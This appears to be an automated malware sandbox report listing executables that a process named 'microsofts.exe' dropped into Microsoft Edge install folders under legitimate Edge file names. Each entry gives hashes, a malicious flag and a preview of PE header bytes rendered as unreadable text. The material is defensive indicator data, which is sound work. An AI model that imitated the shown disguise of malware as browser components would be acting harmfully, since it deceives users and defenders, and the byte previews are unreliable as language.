                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E4D413C4DD7DCC6516F3D21520EDD649FA7AE4BE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:62757CC100A2E05326E2E67E0B348D96FB5265BD39129768187A9335BB1C7663
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ADC219B978C854FF8A2045C56578BDED11502F0C7DBA9EE3DFD4023680D01ED0BD8AE45CF12AFFBD859D170CD288716764B3595BDF00764F3D361000F8CF524A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1657344
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6351399002276406
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:vE8DMeflpnIOvYUxsqjnhMgeiCl7G0nehbGZpbD:vtDD9pnIOTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3A3AAAAE29AD402FBA7ADCE7EC3F959C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7337DC414993168FE2382EE967539BB73D2F6356
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB4F4C83BD6A586169A3B81E989563DE650DDF04A01ED6541DE820300D4EBB76
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B0E87B96CD92C6393C7223E05B7A4265EFFCE4DEFE66B7B4484C5759AF5015607AABEBB9E83D58C12EB5185CF946C5A17B6B232AAD9F2B432AD3D38FFDAC3CAD
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................,.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.748482129645919
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:cB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8E4Dmg27RnWGj:WHzorVmr2ZkRpdJYolCD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E8AE9BC8F9C727900E882FF08D147914
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EE3CB30C64D42F5A17AAAE4730F1A8BE7A26DDDE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:99932A84D5F16DF51134792A11C1665E1484D3730F3542096F4C2A55E37E137E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FA00F14C309639723108A385A6695AEBBEFCD1834433AD848E834EE745D850988A72648C3BBCADF5DE806EEF8E56D8FECBB5F1A04ADBB1538156E068555E0753
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......NC... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1238528
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.146949379214972
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:E3w1uVdSEj/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:EEyT/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA20F721C754A0E7A672962EA1D557DD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA51E5FCCE7747DD494783DC2814352D82DD8AC9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7AB7DCAEEA6C50C5DCB0D174244A0269AB4F51174A9B70FF91D139CBCB25548
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD53717F1B58C052CDC9B59F1353F9F8472D128CF482A9DCC357BF638145CEF623E469E04C0C96126EF5DC4F7379B8202F12FA91924BFB9C3C97A5C0B25CE232
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.049971783149608
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:+hDdVrQ95RW0YEHyWQXE/09Val0GDDmg27RnWGj:+hHYW+HyWKED527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AB5074630045AB26B71225715D67B7F6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1D9BB524B39E60B5F873235012E3DBE5C8BF1B65
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FBDA3042764CD88A241A0AE684D7F307D6EAEA834E2DDFFDA93314A3338E069B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A870A21DE34EE629623268953FB51A704A051623128E8426918EEF33D2D5D9A1AC414368CCB3DF7FA28A9137090901219081B99A33C5E705F69346403C7F4AD6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....iQ$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.158493615955856
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:470E0ZCQZMiU6Rrt9RoctGfmdd8sqjnhMgeiCl7G0nehbGZpbD:s0EzQSyRPRoc1kDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D7D89E332FA347DC99575840ADDC68B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6EE1952A76A62F0E36C1A4C178238445E39915CD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8F56B6D65F2F5F441F282BCDC917B5BAFB66956EA4B11B2F93FFE16EE4E8B8D0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:16486C3D8BEB1F36A797D90C2567383E5E97830FA56739A9D502E74BC8DDE0A4B890E3803AF22ABF24C5430ACD0F84558C9FF21CDBF812DCD7C51716032777A9
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......\.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1454890118593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:1iD2VmA1YXwHwlklb8boUuWPg2gTsqjnhMgeiCl7G0nehbGZpbD:ED2VmAyiwIb8boQYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:314F77D1BB740FD6B9DC27BA42F0EECC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8236A417D71D3EFD096BE96EA2F62E42B82DE726
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AC2EEEAC94E3C9E8FB99E34B5DD906B56FE5C178DFC13DC3FBBB5B29BB516EC4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:03CA8C0D584CB632F2628B3D6ED7FBF594D8B1D8CFA29FEE3AC72580B545467596AEC84B9B05795407AE55FB837AA71599C080BBE6BA65F08F395C511B227DD1
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.950750910981721
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:GfD3zO9ZhBGloizM3HRNr00ADmg27RnWGj:cDaalxzM00AD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:22A283736C3624A718FD7DCCDB239FB9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D60691EF6DE08C203C63C8D956B4FE83037C9399
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6687D0E7CD9D40945A1FE2F19AA285335CB1A2A63EC61E19C23A34D79DB174CC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:10DB5C9814F8A810EE37945DD9A3CBF5B13BD29E1F21198396A29C93AD9D5DBF5C9BABADEC1CF2A4B0CA5BB700348D15683D87FE64FB686B63159F725C051EF6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.824613592540457
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:uTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhrDmg27RnN:BI72LvkrDpbxJRoIMoD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C88BF6ACFD0A07A8EDC35673F2F35109
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:80905B1C4C0625CA4090DDF12E2E88788346D33C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1A8350CCFABFD330D12A36B6E5A737DF44E527949CA47BDFA5F576E415BDE8B4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C65E19F2E710D42106A592366D337C0A70DFBD04383254580EF471717EB4D464E671221975DF6CA32CBE5ACD6E35195F311E9DD1695696594F42D9F298F7F663
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.097242428032111
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:gW9Jml9mmijviMnF+ZxmQWcbLw8VMsqjnhMgeiCl7G0nehbGZpbD:gWnm5iOMkjmQWkV4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:21B67034B4B5072C44CF262034864BD1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2964DF9ACB8C7F21A168AC31645872AD2DCA252
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CFCB92956428B5C694A1AA29B9937C4768FECDFB46FDE6DBB1844A4CC4C5C71D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D630314E411ABC2AFD704C6CACD946350141CB9269EDB1BBAD99EFB7D12FAC12072BB617F2A1CE31A632F727DFAEE6D2A25BDC2D2D67D245217D169424D30602
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....p1 ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166372263973913
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:twNHwoYhua6MtjRO4qbBJTY6mY1uIg2sqjnhMgeiCl7G0nehbGZpbD:twNPdQO7BJTfmE9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B2CB590C0059C8305900CA0E72A7ED62
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0CC8FECA33D5DA6685B649ADDC6FF29412A606D8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:19691BD13B87BF4947009FDBA64B7BFB8836F678EFB9806AE448564BCE389530
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:167E50779B628E0FF6E9FE945A4D706F31BC22AC5F5EC9D169CB840EE8831629D2E3F8E2C3CA377F3A521142B1D840ED08B56B4EC23ADF055F051DA39B139BFE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.145485109807925
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:oiD2VmA1YXwHwlklb8boUuWPg2gTsqjnhMgeiCl7G0nehbGZpbD:bD2VmAyiwIb8boQYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4839581D0118B76CE7AD1FD83482050
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8714FE9FD3E2251C1AB44A59C3F7338E62E43BF2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DC339EB3724800FB8EE0AC959AABBAA4DC75B8377D8F23C42A995D11BBB8B9E0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:68D3AF23F910C13994E3F68F3AB4B60469AC9C90C3FE21147FB0A8ECC54BC434AC1A40D7F90A55E765F39248AA1CE0814DEC763F020CC652312133C37F6F28E4
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......$.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166368227577133
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:rwNHwoYhua6MtjRO4qbBJTY6mY1uIg2sqjnhMgeiCl7G0nehbGZpbD:rwNPdQO7BJTfmE9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B25467628441BB5C68FD27C6478F9840
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6005C0F62305AF32457FA076EC5439DB2AD86911
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5C01D4A2EF739AC9C795FF0F2D9C5B991EAC7DBAE186B6B18F486B9962C46A3B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F91E4FA4B28DB49D28F95E9700AE4A5A0F604C65A4A1E46F908E89322316EDD3B0F225D3FD919DBDDEDA041B187726542CE4F4AC299BEEB4F31A248AE1F31054
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1418728080205085
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:a4lbht6BHtsqjnhMgeiCl7G0nehbGZpbD:blNtqHRDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4E7A7A22E35EEAE924D2896095C48B6D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:20DF1E9CCD9CA9FAA4EA0A921B7B70A2E4902841
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F25D291DCF305866B28106828CED9D4A322A45830FA4D419CF0B6CB2DDABB21D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:90CF3194D812E29392A6B58F7E8297F9B4A1256A4BD96CD366737B78A4CC7BE3A940260CE963E07357D78D8D24629FCDACBB08DAF3FEFF16F13FF65013CD75E3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
